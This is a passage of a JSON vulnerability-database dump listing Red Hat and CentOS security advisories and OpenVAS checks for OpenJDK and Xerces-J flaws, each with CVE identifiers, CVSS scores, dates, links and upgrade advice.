by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. A list of these changes is available from the JBoss\nEnterprise Application Platform 6.3.2 Downloads page on the Customer\nPortal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 5 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "published": "2014-11-06T05:00:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2014:1821", "cvelist": ["CVE-2013-4002"], "lastseen": "2016-09-04T11:17:41"}], "centos": [{"id": "CESA-2013:1505", "type": "centos", "title": "java security update", "description": "**CentOS Errata and Security Advisory** CESA-2013:1505\n\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-November/020016.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-November/020019.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1505.html", "published": "2013-11-05T20:45:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2013-November/020016.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-03T18:25:12"}, {"id": "CESA-2013:1451", "type": "centos", "title": "java security update", "description": "**CentOS Errata and Security Advisory** CESA-2013:1451\n\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-October/019985.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1451.html", "published": "2013-10-23T11:04:05", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2013-October/019985.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-03T18:25:08"}, {"id": "CESA-2013:1447", "type": "centos", "title": "java security update", "description": "**CentOS Errata and Security Advisory** CESA-2013:1447\n\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-October/019980.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1447.html", "published": "2013-10-22T07:41:01", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2013-October/019980.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-03T18:26:31"}, {"id": "CESA-2014:1319", "type": "centos", "title": "xerces security update", "description": "**CentOS Errata and Security Advisory** CESA-2014:1319\n\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2 packages\nprovide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. Applications using the\nXerces-J must be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/020603.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/020605.html\n\n**Affected packages:**\nxerces-j2\nxerces-j2-demo\nxerces-j2-javadoc\nxerces-j2-javadoc-apis\nxerces-j2-javadoc-impl\nxerces-j2-javadoc-other\nxerces-j2-javadoc-xni\nxerces-j2-scripts\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1319.html", "published": "2014-09-30T10:18:46", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2014-September/020603.html", "cvelist": ["CVE-2013-4002"], "lastseen": "2017-10-03T18:24:55"}, {"id": "CESA-2014:0408", "type": "centos", "title": "java security update", "description": "**CentOS Errata and Security Advisory** CESA-2014:0408\n\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nAn input validation flaw was discovered in the medialib library in the 2D\ncomponent. A specially crafted image could trigger Java Virtual Machine\nmemory corruption when processed. A remote attacker, or an untrusted Java\napplication or applet, could possibly use this flaw to execute arbitrary\ncode with the privileges of the user running the Java Virtual Machine.\n(CVE-2014-0429)\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to trigger\nJava Virtual Machine memory corruption and possibly bypass Java sandbox\nrestrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)\n\nMultiple improper permission check issues were discovered in the Libraries\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2014-0457,\nCVE-2014-0461)\n\nMultiple improper permission check issues were discovered in the AWT,\nJAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java\napplication or applet could use these flaws to bypass certain Java sandbox\nrestrictions. (CVE-2014-2412, CVE-2014-0451, CVE-2014-0458, CVE-2014-2423,\nCVE-2014-0452, CVE-2014-2414, CVE-2014-0446, CVE-2014-2427)\n\nMultiple flaws were identified in the Java Naming and Directory Interface\n(JNDI) DNS client. These flaws could make it easier for a remote attacker\nto perform DNS spoofing attacks. (CVE-2014-0460)\n\nIt was discovered that the JAXP component did not properly prevent access\nto arbitrary files when a SecurityManager was present. This flaw could\ncause a Java application using JAXP to leak sensitive information, or\naffect application availability. (CVE-2014-2403)\n\nIt was discovered that the Security component in OpenJDK could leak some\ntiming information when performing PKCS#1 unpadding. This could possibly\nlead to the disclosure of some information that was meant to be protected\nby encryption. (CVE-2014-0453)\n\nIt was discovered that the fix for CVE-2013-5797 did not properly resolve\ninput sanitization flaws in javadoc. When javadoc documentation was\ngenerated from an untrusted Java source code and hosted on a domain not\ncontrolled by the code author, these issues could make it easier to perform\ncross-site scripting (XSS) attacks. (CVE-2014-2398)\n\nAn insecure temporary file use flaw was found in the way the unpack200\nutility created log files. A local attacker could possibly use this flaw to\nperform a symbolic link attack and overwrite arbitrary files with the\nprivileges of the user running unpack200. (CVE-2014-1876)\n\nThis update also fixes the following bug:\n\n* The OpenJDK update to IcedTea version 1.13 introduced a regression\nrelated to the handling of the jdk_version_info variable. This variable was\nnot properly zeroed out before being passed to the Java Virtual Machine,\nresulting in a memory leak in the java.lang.ref.Finalizer class.\nThis update fixes this issue, and memory leaks no longer occur.\n(BZ#1085373)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/020257.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/020258.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0408.html", "published": "2014-04-16T13:16:06", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/020257.html", "cvelist": ["CVE-2014-2397", "CVE-2014-0457", "CVE-2014-0446", "CVE-2014-1876", "CVE-2014-0458", "CVE-2014-2427", "CVE-2014-0453", "CVE-2014-0461", "CVE-2014-0456", "CVE-2014-0429", "CVE-2014-2403", "CVE-2014-2412", "CVE-2014-2421", "CVE-2014-0460", "CVE-2014-2423", "CVE-2014-2398", "CVE-2014-0451", "CVE-2014-0452", "CVE-2014-2414", "CVE-2013-5797"], "lastseen": "2017-10-03T18:26:16"}, {"id": "CESA-2014:0406", "type": "centos", "title": "java security update", "description": "**CentOS Errata and Security Advisory** CESA-2014:0406\n\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit.\n\nAn input validation flaw was discovered in the medialib library in the 2D\ncomponent. A specially crafted image could trigger Java Virtual Machine\nmemory corruption when processed. A remote attacker, or an untrusted Java\napplication or applet, could possibly use this flaw to execute arbitrary\ncode with the privileges of the user running the Java Virtual Machine.\n(CVE-2014-0429)\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to trigger\nJava Virtual Machine memory corruption and possibly bypass Java sandbox\nrestrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)\n\nMultiple improper permission check issues were discovered in the Libraries\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2014-0457,\nCVE-2014-0455, CVE-2014-0461)\n\nMultiple improper permission check issues were discovered in the AWT,\nJAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2014-2412, CVE-2014-0451,\nCVE-2014-0458, CVE-2014-2423, CVE-2014-0452, CVE-2014-2414, CVE-2014-2402,\nCVE-2014-0446, CVE-2014-2413, CVE-2014-0454, CVE-2014-2427, CVE-2014-0459)\n\nMultiple flaws were identified in the Java Naming and Directory Interface\n(JNDI) DNS client. These flaws could make it easier for a remote attacker\nto perform DNS spoofing attacks. (CVE-2014-0460)\n\nIt was discovered that the JAXP component did not properly prevent access\nto arbitrary files when a SecurityManager was present. This flaw could\ncause a Java application using JAXP to leak sensitive information, or\naffect application availability. (CVE-2014-2403)\n\nIt was discovered that the Security component in OpenJDK could leak some\ntiming information when performing PKCS#1 unpadding. This could possibly\nlead to the disclosure of some information that was meant to be protected\nby encryption. (CVE-2014-0453)\n\nIt was discovered that the fix for CVE-2013-5797 did not properly resolve\ninput sanitization flaws in javadoc. When javadoc documentation was\ngenerated from an untrusted Java source code and hosted on a domain not\ncontrolled by the code author, these issues could make it easier to perform\ncross-site scripting (XSS) attacks. (CVE-2014-2398)\n\nAn insecure temporary file use flaw was found in the way the unpack200\nutility created log files. A local attacker could possibly use this flaw to\nperform a symbolic link attack and overwrite arbitrary files with the\nprivileges of the user running unpack200. (CVE-2014-1876)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/020256.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0406.html", "published": "2014-04-16T13:14:43", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/020256.html", "cvelist": ["CVE-2014-2397", "CVE-2014-0457", "CVE-2014-0455", "CVE-2014-0446", "CVE-2014-1876", "CVE-2014-0458", "CVE-2014-2427", "CVE-2014-2413", "CVE-2014-0454", "CVE-2014-0453", "CVE-2014-0461", "CVE-2014-0459", "CVE-2014-0456", "CVE-2014-0429", "CVE-2014-2403", "CVE-2014-2412", "CVE-2014-2421", "CVE-2014-0460", "CVE-2014-2423", "CVE-2014-2398", "CVE-2014-0451", "CVE-2014-0452", "CVE-2014-2414", "CVE-2013-5797", "CVE-2014-2402"], "lastseen": "2017-10-03T18:26:42"}, {"id": "CESA-2014:0407", "type": "centos", "title": "java security update", "description": "**CentOS Errata and Security Advisory** CESA-2014:0407\n\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit.\n\nAn input validation flaw was discovered in the medialib library in the 2D\ncomponent. A specially crafted image could trigger Java Virtual Machine\nmemory corruption when processed. A remote attacker, or an untrusted Java\napplication or applet, could possibly use this flaw to execute arbitrary\ncode with the privileges of the user running the Java Virtual Machine.\n(CVE-2014-0429)\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to trigger\nJava Virtual Machine memory corruption and possibly bypass Java sandbox\nrestrictions. (CVE-2014-0456, CVE-2014-2397, CVE-2014-2421)\n\nMultiple improper permission check issues were discovered in the Libraries\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2014-0457,\nCVE-2014-0455, CVE-2014-0461)\n\nMultiple improper permission check issues were discovered in the AWT,\nJAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2014-2412, CVE-2014-0451,\nCVE-2014-0458, CVE-2014-2423, CVE-2014-0452, CVE-2014-2414, CVE-2014-2402,\nCVE-2014-0446, CVE-2014-2413, CVE-2014-0454, CVE-2014-2427, CVE-2014-0459)\n\nMultiple flaws were identified in the Java Naming and Directory Interface\n(JNDI) DNS client. These flaws could make it easier for a remote attacker\nto perform DNS spoofing attacks. (CVE-2014-0460)\n\nIt was discovered that the JAXP component did not properly prevent access\nto arbitrary files when a SecurityManager was present. This flaw could\ncause a Java application using JAXP to leak sensitive information, or\naffect application availability. (CVE-2014-2403)\n\nIt was discovered that the Security component in OpenJDK could leak some\ntiming information when performing PKCS#1 unpadding. This could possibly\nlead to the disclosure of some information that was meant to be protected\nby encryption. (CVE-2014-0453)\n\nIt was discovered that the fix for CVE-2013-5797 did not properly resolve\ninput sanitization flaws in javadoc. When javadoc documentation was\ngenerated from an untrusted Java source code and hosted on a domain not\ncontrolled by the code author, these issues could make it easier to perform\ncross-site scripting (XSS) attacks. (CVE-2014-2398)\n\nAn insecure temporary file use flaw was found in the way the unpack200\nutility created log files. A local attacker could possibly use this flaw to\nperform a symbolic link attack and overwrite arbitrary files with the\nprivileges of the user running unpack200. (CVE-2014-1876)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/020259.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0407.html", "published": "2014-04-16T13:38:30", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/020259.html", "cvelist": ["CVE-2014-2397", "CVE-2014-0457", "CVE-2014-0455", "CVE-2014-0446", "CVE-2014-1876", "CVE-2014-0458", "CVE-2014-2427", "CVE-2014-2413", "CVE-2014-0454", "CVE-2014-0453", "CVE-2014-0461", "CVE-2014-0459", "CVE-2014-0456", "CVE-2014-0429", "CVE-2014-2403", "CVE-2014-2412", "CVE-2014-2421", "CVE-2014-0460", "CVE-2014-2423", "CVE-2014-2398", "CVE-2014-0451", "CVE-2014-0452", "CVE-2014-2414", "CVE-2013-5797", "CVE-2014-2402"], "lastseen": "2017-10-03T18:25:12"}], "openvas": [{"id": "OPENVAS:1361412562310871062", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2013:1505-01", "description": "Check for the Version of java-1.6.0-openjdk", "published": "2013-11-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871062", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-04-06T11:23:29"}, {"id": "OPENVAS:1361412562310123534", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-1505", "description": "Oracle Linux Local Security Checks ELSA-2013-1505", "published": "2015-10-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123534", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-07-24T12:53:49"}, {"id": "OPENVAS:881822", "type": "openvas", "title": "CentOS Update for java CESA-2013:1505 centos5 ", "description": "Check for the Version of java", "published": "2013-11-08T00:00:00", "cvss": {"score": 10.0, "vector": 